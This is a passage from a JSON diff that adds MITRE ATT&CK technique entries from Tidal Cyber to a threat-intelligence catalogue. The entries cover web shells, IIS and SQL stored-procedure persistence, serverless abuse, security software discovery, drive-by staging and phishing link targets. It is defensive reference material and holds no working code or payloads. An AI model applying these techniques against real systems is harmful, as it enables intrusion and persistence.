"62bc11f9-f88c-437a-98ae-e90def576e7e", + "type": "similar" + }, + { + "dest-uuid": "d97c3d34-1210-4c71-b305-59dcccab8f45", + "type": "similar" + } + ], + "uuid": "f2d216e3-43d6-4a2e-aa5b-d6be78d018b6", + "value": "Search Open Websites/Domains" + }, + { + "description": "Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://app.tidalcyber.com/technique/2eee984c-ea00-4284-b3eb-fd0c603a5a80)). These sites may also have details highlighting business operations and relationships.[[Comparitech Leak](https://app.tidalcyber.com/references/fa0eac56-45ea-4628-88cf-b843874b4a4d)]\n\nAdversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf) or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533)).", + "meta": { + "platforms": [ + "PRE" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + } + ], + "uuid": "c55c0462-d59f-4bd8-9728-05cf711917b0", + "value": "Search Victim-Owned Websites" + }, + { + "description": "Adversaries may abuse serverless computing, integration, and automation services to execute arbitrary code in cloud environments. Many cloud providers offer a variety of serverless resources, including compute engines, application integration services, and web servers. \n\nAdversaries may abuse these resources in various ways as a means of executing arbitrary commands. For example, adversaries may use serverless functions to execute malicious code, such as crypto-mining malware (i.e. [Resource Hijacking](https://app.tidalcyber.com/technique/d10c4a15-aeaa-4630-a7a3-3373c89a584f)).[[Cado Security Denonia](https://app.tidalcyber.com/references/584e7ace-ef33-423b-9801-4728a447cb34)] Adversaries may also create functions that enable further compromise of the cloud environment. For example, an adversary may use the `IAM:PassRole` permission in AWS or the `iam.serviceAccounts.actAs` permission in Google Cloud to add [Additional Cloud Roles](https://app.tidalcyber.com/technique/71867386-ddc2-4cdb-a0c9-7c27172c23c1) to a serverless cloud function, which may then be able to perform actions the original user cannot.[[Rhino Security Labs AWS Privilege Escalation](https://app.tidalcyber.com/references/693e5783-4aa1-40ce-8080-cec01c3e7b59)][[Rhingo Security Labs GCP Privilege Escalation](https://app.tidalcyber.com/references/55373476-1cbe-49f5-aecb-69d60b336d38)]\n\nServerless functions can also be invoked in response to cloud events (i.e. [Event Triggered Execution](https://app.tidalcyber.com/technique/e1e42979-d3cd-461b-afc4-a6373cbf97ba)), potentially enabling persistent execution over time. For example, in AWS environments, an adversary may create a Lambda function that automatically adds [Additional Cloud Credentials](https://app.tidalcyber.com/technique/0799f2ee-3a83-452e-9fa9-83e91d83be25) to a user and a corresponding CloudWatch events rule that invokes that function whenever a new user is created.[[Backdooring an AWS account](https://app.tidalcyber.com/references/2c867527-1584-44f7-b5e5-8ca54ea79619)] Similarly, an adversary may create a Power Automate workflow in Office 365 environments that forwards all emails a user receives or creates anonymous sharing links whenever a user is granted access to a document in SharePoint.[[Varonis Power Automate Data Exfiltration](https://app.tidalcyber.com/references/16436468-1daf-433d-bb3b-f842119594b4)][[Microsoft DART Case Report 001](https://app.tidalcyber.com/references/bd8c6a86-1a63-49cd-a97f-3d119e4223d4)]", + "meta": { + "platforms": [ + "IaaS", + "Office 365", + "SaaS" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "type": "uses" + } + ], + "uuid": "d9edb609-2ca3-43d1-9c4d-c09a2856230f", + "value": "Serverless Execution" + }, + { + "description": "Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: Get{Extension/Filter}Version, Http{Extension/Filter}Proc, and (optionally) Terminate{Extension/Filter}. IIS modules may also be installed to extend IIS web servers.[[Microsoft ISAPI Extension Overview 2017](https://app.tidalcyber.com/references/d00a692f-b990-4757-8acd-56818462ac0c)][[Microsoft ISAPI Filter Overview 2017](https://app.tidalcyber.com/references/2fdbf1ba-0480-4d70-9981-3b5967656472)][[IIS Backdoor 2011](https://app.tidalcyber.com/references/fd450382-cca0-40c4-8144-cc90a3b0011b)][[Trustwave IIS Module 2013](https://app.tidalcyber.com/references/cbb79c3c-1e2c-42ac-8183-9566ccde0cd6)]\n\nAdversaries may install malicious ISAPI extensions and filters to observe and/or modify traffic, execute commands on compromised machines, or proxy command and control traffic. ISAPI extensions and filters may have access to all IIS web requests and responses. For example, an adversary may abuse these mechanisms to modify HTTP responses in order to distribute malicious commands/content to previously comprised hosts.[[Microsoft ISAPI Filter Overview 2017](https://app.tidalcyber.com/references/2fdbf1ba-0480-4d70-9981-3b5967656472)][[Microsoft ISAPI Extension Overview 2017](https://app.tidalcyber.com/references/d00a692f-b990-4757-8acd-56818462ac0c)][[Microsoft ISAPI Extension All Incoming 2017](https://app.tidalcyber.com/references/7d182eee-eaa8-4b6f-803d-8eb64e338663)][[Dell TG-3390](https://app.tidalcyber.com/references/dfd2d832-a6c5-40e7-a554-5a92f05bebae)][[Trustwave IIS Module 2013](https://app.tidalcyber.com/references/cbb79c3c-1e2c-42ac-8183-9566ccde0cd6)][[MMPC ISAPI Filter 2012](https://app.tidalcyber.com/references/ef412bcd-54be-4972-888c-f5a2cdfb8d02)]\n\nAdversaries may also install malicious IIS modules to observe and/or modify traffic. IIS 7.0 introduced modules that provide the same unrestricted access to HTTP requests and responses as ISAPI extensions and filters. IIS modules can be written as a DLL that exports RegisterModule, or as a .NET application that interfaces with ASP.NET APIs to access IIS HTTP requests.[[Microsoft IIS Modules Overview 2007](https://app.tidalcyber.com/references/c8db6bfd-3a08-43b3-b33b-91a32e9bd694)][[Trustwave IIS Module 2013](https://app.tidalcyber.com/references/cbb79c3c-1e2c-42ac-8183-9566ccde0cd6)][[ESET IIS Malware 2021](https://app.tidalcyber.com/references/d9c6e55b-39b7-4097-8ab2-8b87421ce2f4)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1505.004" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + } + ], + "uuid": "e4495b87-9b04-4313-b771-7d9703639cce", + "value": "IIS Components" + }, + { + "description": "Adversaries may abuse SQL stored procedures to establish persistent access to systems. SQL Stored Procedures are code that can be saved and reused so that database users do not waste time rewriting frequently used SQL queries. Stored procedures can be invoked via SQL statements to the database using the procedure name or via defined events (e.g. when a SQL server application is started/restarted).\n\nAdversaries may craft malicious stored procedures that can provide a persistence mechanism in SQL database servers.[[NetSPI Startup Stored Procedures](https://app.tidalcyber.com/references/afe89472-ac42-4a0d-b398-5ed6a5dee74f)][[Kaspersky MSSQL Aug 2019](https://app.tidalcyber.com/references/569a6be3-7a10-4aa4-be26-a62ed562a4ce)] To execute operating system commands through SQL syntax the adversary may have to enable additional functionality, such as xp_cmdshell for MSSQL Server.[[NetSPI Startup Stored Procedures](https://app.tidalcyber.com/references/afe89472-ac42-4a0d-b398-5ed6a5dee74f)][[Kaspersky MSSQL Aug 2019](https://app.tidalcyber.com/references/569a6be3-7a10-4aa4-be26-a62ed562a4ce)][[Microsoft xp_cmdshell 2017](https://app.tidalcyber.com/references/1945b8b2-de29-4f7a-8957-cc96fbad3b11)] \n\nMicrosoft SQL Server can enable common language runtime (CLR) integration. With CLR integration enabled, application developers can write stored procedures using any .NET framework language (e.g. VB .NET, C#, etc.).[[Microsoft CLR Integration 2017](https://app.tidalcyber.com/references/83fc7522-5eb1-4710-8391-090389948686)] Adversaries may craft or modify CLR assemblies that are linked to stored procedures since these CLR assemblies can be made to execute arbitrary commands.[[NetSPI SQL Server CLR](https://app.tidalcyber.com/references/6f3d8c89-9d5d-4754-98d5-44fe3a5dd0d5)] ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1505.001" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + } + ], + "uuid": "35197aee-8cc9-4584-bd22-33c8885db669", + "value": "SQL Stored Procedures" + }, + { + "description": "Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.[[Microsoft Remote Desktop Services](https://app.tidalcyber.com/references/a981e013-f839-46e9-9c8a-128c4897f77a)]\n\n[Windows Service](https://app.tidalcyber.com/technique/31c6dd3c-3eb2-46a9-ab85-9e8e145810a1)s that are run as a \"generic\" process (ex: svchost.exe) load the service's DLL file, the location of which is stored in a Registry entry named ServiceDll.[[Microsoft System Services Fundamentals](https://app.tidalcyber.com/references/25d54a16-59a0-497d-a4a5-021420da8f1c)] The termsrv.dll file, typically stored in `%SystemRoot%\\System32\\`, is the default ServiceDll value for Terminal Services in `HKLM\\System\\CurrentControlSet\\services\\TermService\\Parameters\\`.\n\nAdversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.[[James TermServ DLL](https://app.tidalcyber.com/references/5a9e4f0f-83d6-4f18-a358-a9ad450c2734)] Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal termsrv.dll functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://app.tidalcyber.com/technique/f5fb86b6-abf0-4d44-b4a0-56f0636c24d2) sessions by either patching the termsrv.dll file or modifying the ServiceDll value to point to a DLL that provides increased RDP functionality.[[Windows OS Hub RDP](https://app.tidalcyber.com/references/335480f8-8f40-4da7-b083-6a4b158496c1)][[RDPWrap Github](https://app.tidalcyber.com/references/777a0a6f-3684-4888-ae1b-adc386be763a)] On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1505.005" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + } + ], + "uuid": "ae967542-1f37-4eea-993d-fff3867f2aea", + "value": "Terminal Services DLL" + }, + { + "description": "Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.[[Microsoft TransportAgent Jun 2016](https://app.tidalcyber.com/references/16ae3e7e-5f0d-4ca9-8453-be960b2111b6)][[ESET LightNeuron May 2019](https://app.tidalcyber.com/references/679aa333-572c-44ba-b94a-606f168d1ed2)] Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks. \n\nAdversaries may register a malicious transport agent to provide a persistence mechanism in Exchange Server that can be triggered by adversary-specified email events.[[ESET LightNeuron May 2019](https://app.tidalcyber.com/references/679aa333-572c-44ba-b94a-606f168d1ed2)] Though a malicious transport agent may be invoked for all emails passing through the Exchange transport pipeline, the agent can be configured to only carry out specific tasks in response to adversary defined criteria. For example, the transport agent may only carry out an action like copying in-transit attachments and saving them for later exfiltration if the recipient email address matches an entry on a list provided by the adversary. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1505.002" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + } + ], + "uuid": "c2be31d9-c800-4cc7-81b9-f3fdb94fbb43", + "value": "Transport Agent" + }, + { + "description": "Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.[[volexity_0day_sophos_FW](https://app.tidalcyber.com/references/85bee18e-216d-4ea6-b34e-b071e3f63382)]\n\nIn addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (e.g. [China Chopper](https://app.tidalcyber.com/software/723c5ab7-23ca-46f2-83bb-f1d1e550122c) Web shell client).[[Lee 2013](https://app.tidalcyber.com/references/6d1e2b0a-fed2-490b-be25-6580dfb7d6aa)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1505.003" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + } + ], + "uuid": "05a5318f-476d-44c1-8a85-9466295d31dd", + "value": "Web Shell" + }, + { + "description": "Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.[[volexity_0day_sophos_FW](https://app.tidalcyber.com/references/85bee18e-216d-4ea6-b34e-b071e3f63382)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Network", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "e4495b87-9b04-4313-b771-7d9703639cce", + "type": "similar" + }, + { + "dest-uuid": "35197aee-8cc9-4584-bd22-33c8885db669", + "type": "similar" + }, + { + "dest-uuid": "ae967542-1f37-4eea-993d-fff3867f2aea", + "type": "similar" + }, + { + "dest-uuid": "c2be31d9-c800-4cc7-81b9-f3fdb94fbb43", + "type": "similar" + }, + { + "dest-uuid": "05a5318f-476d-44c1-8a85-9466295d31dd", + "type": "similar" + } + ], + "uuid": "03fb32fa-cdee-4e94-ae3e-16b51a10ba9c", + "value": "Server Software Component" + }, + { + "description": "Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)][[Novetta Blockbuster](https://app.tidalcyber.com/references/bde96b4f-5f98-4ce5-a507-4b05d192b6d7)] \n\nAdversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS, which will make Exchange content inaccessible [[Novetta Blockbuster](https://app.tidalcyber.com/references/bde96b4f-5f98-4ce5-a507-4b05d192b6d7)]. In some cases, adversaries may stop or disable many or all services to render systems unusable.[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)] Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34) or [Data Encrypted for Impact](https://app.tidalcyber.com/technique/f0c36d24-263c-4811-8784-f716c77ec6b3) on the data stores of services like Exchange and SQL Server.[[SecureWorks WannaCry Analysis](https://app.tidalcyber.com/references/522b2a19-1d15-48f8-8801-c64d3abd945a)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f", + "type": "uses" + } + ], + "uuid": "e27c5756-f43e-424f-af62-b21e8b304e5d", + "value": "Service Stop" + }, + { + "description": "Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560)).\n\nAdversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, adversaries can modularize functionality of their malware into shared objects that perform various functions such as managing C2 network communications or execution of specific actions on objective.\n\nThe Linux & macOS module loader can load and execute shared objects from arbitrary local paths. This functionality resides in `dlfcn.h` in functions such as `dlopen` and `dlsym`. Although macOS can execute `.so` files, common practice uses `.dylib` files.[[Apple Dev Dynamic Libraries](https://app.tidalcyber.com/references/39ffd162-4052-57ec-bd20-2fe6b8e6beab)][[Linux Shared Libraries](https://app.tidalcyber.com/references/054d769a-f88e-55e9-971a-f169ee434cfe)][[RotaJakiro 2021 netlab360 analysis](https://app.tidalcyber.com/references/7a9c53dd-2c0e-5452-9ee2-01531fbf8ba8)][[Unit42 OceanLotus 2017](https://app.tidalcyber.com/references/fcaf57f1-6696-54a5-a78c-255c8f6ac235)]\n\nThe Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in `NTDLL.dll` and is part of the Windows [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) which is called from functions like `LoadLibrary` at run time.[[Microsoft DLL](https://app.tidalcyber.com/references/f0ae2788-537c-5644-ba1b-d06a612e73c1)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "type": "uses" + } + ], + "uuid": "8941d1f4-d80c-4aaa-821a-a059c2a0f854", + "value": "Shared Modules" + }, + { + "description": "Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.). \n\nAccess to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints. Network infrastructure may also have administration tools that can be similarly abused by adversaries. [[Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation](https://app.tidalcyber.com/references/a43dd8ce-23d6-5768-8522-6973dc45e1ac)]\n\nThe permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform it's intended purpose.", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Network", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "type": "uses" + }, + { + "dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb", + "type": "uses" + } + ], + "uuid": "1bcf9fb5-6848-44d9-b394-ffbd3c357058", + "value": "Software Deployment Tools" + }, + { + "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://app.tidalcyber.com/technique/9e945aa5-3883-4537-a767-f49bdcce26c7) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nExample commands that can be used to obtain security software information are [netsh](https://app.tidalcyber.com/software/803192b8-747b-4108-ae15-2d7481d39162), reg query with [Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532), dir with [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8), and [Tasklist](https://app.tidalcyber.com/software/abae8f19-9497-4a71-82b6-ae6edd26ad98), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.\n\nAdversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.[[Expel IO Evil in AWS](https://app.tidalcyber.com/references/4c2424d6-670b-4db0-a752-868b4c954e29)] For example, the permitted IP ranges, ports or user accounts for the inbound/outbound rules of security groups, virtual firewalls established within AWS for EC2 and/or VPC instances, can be revealed by the DescribeSecurityGroups action with various request parameters. [[DescribeSecurityGroups - Amazon Elastic Compute Cloud](https://app.tidalcyber.com/references/aa953df5-40b5-42d2-9e33-a227a093497f)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1518.001" + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "9e945aa5-3883-4537-a767-f49bdcce26c7", + "value": "Security Software Discovery" + }, + { + "description": "Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://app.tidalcyber.com/technique/e9bff6ff-3142-4910-8f67-19b868912602) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nAdversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c).", + "meta": { + "platforms": [ + "Azure AD", + "Google Workspace", + "IaaS", + "Linux", + "macOS", + "Office 365", + "SaaS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + }, + { + "dest-uuid": "9e945aa5-3883-4537-a767-f49bdcce26c7", + "type": "similar" + } + ], + "uuid": "e9bff6ff-3142-4910-8f67-19b868912602", + "value": "Software Discovery" + }, + { + "description": "Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://app.tidalcyber.com/technique/8592f37d-850a-43d1-86f2-cc981ad7d7dc). Prior to [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3)) or previously compromised ([Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)).\n\nAdversaries may upload or inject malicious web content, such as [JavaScript](https://app.tidalcyber.com/technique/8a669da8-8894-4fb0-9124-c3c8418985cc), into websites.[[FireEye CFR Watering Hole 2012](https://app.tidalcyber.com/references/6108ab77-e4fd-43f2-9d49-8ce9c219ca9c)][[Gallagher 2015](https://app.tidalcyber.com/references/b1540c5c-0bbc-4b9d-9185-fae224ba31be)] This may be done in a number of ways, including:\n\n* Inserting malicious scripts into web pages or other user controllable web content such as forum posts\n* Modifying script files served to websites from publicly writeable cloud storage buckets\n* Crafting malicious web advertisements and purchasing ad space on a website through legitimate ad providers (i.e., [Malvertising](https://app.tidalcyber.com/technique/60ac24aa-ce63-5c1d-8126-db20a27d85be))\n\nIn addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in [Gather Victim Host Information](https://app.tidalcyber.com/technique/4acf57da-73c1-4555-a86a-38ea4a8b962d)) to ensure it is vulnerable prior to attempting exploitation.[[ATT ScanBox](https://app.tidalcyber.com/references/48753fc9-b7b7-465f-92a7-fb3f51b032cb)]\n\nWebsites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is referred to a strategic web compromise or watering hole attack.\n\nAdversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://app.tidalcyber.com/technique/b9f5f6b7-ecff-48c8-a23e-c58fd9e41a0d)) to help facilitate [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1608.004" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "f2661f07-9027-4d19-9028-d07b7511f3d5", + "value": "Drive-by Target" + }, + { + "description": "Adversaries may install SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are files that can be installed on servers to enable secure communications between systems. Digital certificates include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate securely with its owner. Certificates can be uploaded to a server, then the server can be configured to use the certificate to enable encrypted communication with it.[[DigiCert Install SSL Cert](https://app.tidalcyber.com/references/a1d7d368-6092-4421-99de-44e458deee21)]\n\nAdversaries may install SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://app.tidalcyber.com/technique/ce822cce-f7f1-4753-bff1-12e5bef66d53) with [Web Protocols](https://app.tidalcyber.com/technique/9a21ec7b-9714-4073-9bf3-4df41995c698)) or lending credibility to a credential harvesting site. Installation of digital certificates may take place for a number of server types, including web servers and email servers. \n\nAdversaries can obtain digital certificates (see [Digital Certificates](https://app.tidalcyber.com/technique/4c0db4e5-14e0-4fb7-88b0-bb391ce5ad58)) or create self-signed certificates (see [Digital Certificates](https://app.tidalcyber.com/technique/5bcbb0c5-7061-481f-a677-09028a6c59f7)). Digital certificates can then be installed on adversary controlled infrastructure that may have been acquired ([Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3)) or previously compromised ([Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1608.003" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "0b2a9df9-65c8-4a01-a0e6-d411e54a4c7b", + "value": "Install Digital Certificate" + }, + { + "description": "Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://app.tidalcyber.com/technique/46f60fff-71a1-4cfd-b639-71a0ac903bbb). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://app.tidalcyber.com/technique/4a68c72c-79c1-4fed-9107-75bb5b06dfc3)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://app.tidalcyber.com/technique/d08a9977-9fc2-46bb-84f9-dbb5187c426d)), an adversary must set up the resources for a link target for the spearphishing link. \n\nTypically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://app.tidalcyber.com/technique/8a669da8-8894-4fb0-9124-c3c8418985cc) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://app.tidalcyber.com/technique/4a68c72c-79c1-4fed-9107-75bb5b06dfc3).[[Malwarebytes Silent Librarian October 2020](https://app.tidalcyber.com/references/9bb8ddd0-a8ec-459b-9983-79ccf46297ca)][[Proofpoint TA407 September 2019](https://app.tidalcyber.com/references/e787e9af-f496-442a-8b36-16056ff8bfc1)] Adversaries may also [Upload Malware](https://app.tidalcyber.com/technique/8ecf5275-c6d1-4fe3-a24a-63fa1f3144fe) and have the link target point to malware for download/execution by the user.\n\nAdversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://app.tidalcyber.com/technique/b9f5f6b7-ecff-48c8-a23e-c58fd9e41a0d)) to help facilitate [Malicious Link](https://app.tidalcyber.com/technique/46f60fff-71a1-4cfd-b639-71a0ac903bbb). Link shortening services can also be employed. Adversaries may also use free or paid accounts on Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked.[[Netskope GCP Redirection](https://app.tidalcyber.com/references/18efeffc-c47b-46ad-8e7b-2eda30a406f0)][[Netskope Cloud Phishing](https://app.tidalcyber.com/references/25d46bc1-4c05-48d3-95f0-aa3ee1100bf9)][[Intezer App Service Phishing](https://app.tidalcyber.com/references/e86abbd9-f349-4d90-8ec9-899fe1637f94)] Finally, adversaries may take advantage of the decentralized nature of the InterPlanetary File System (IPFS) to host link targets that are difficult to remove.[[Talos IPFS 2022](https://app.tidalcyber.com/references/dc98c7ce-0a3f-5f35-9885-6c1c73e5858d)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1608.005" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "6824c82b-2959-4402-831a-6e7c2010d1c5", + "value": "Link Target" + }, + { + "description": "Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.[[Atlas SEO](https://app.tidalcyber.com/references/26d7134e-7b93-4aa1-a859-03cf964ca1b5)][[MalwareBytes SEO](https://app.tidalcyber.com/references/250b09a2-dd97-4fbf-af2f-618d1f126957)]\n\nTo help facilitate [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381), adversaries may stage content that explicitly manipulates SEO rankings in order to promote 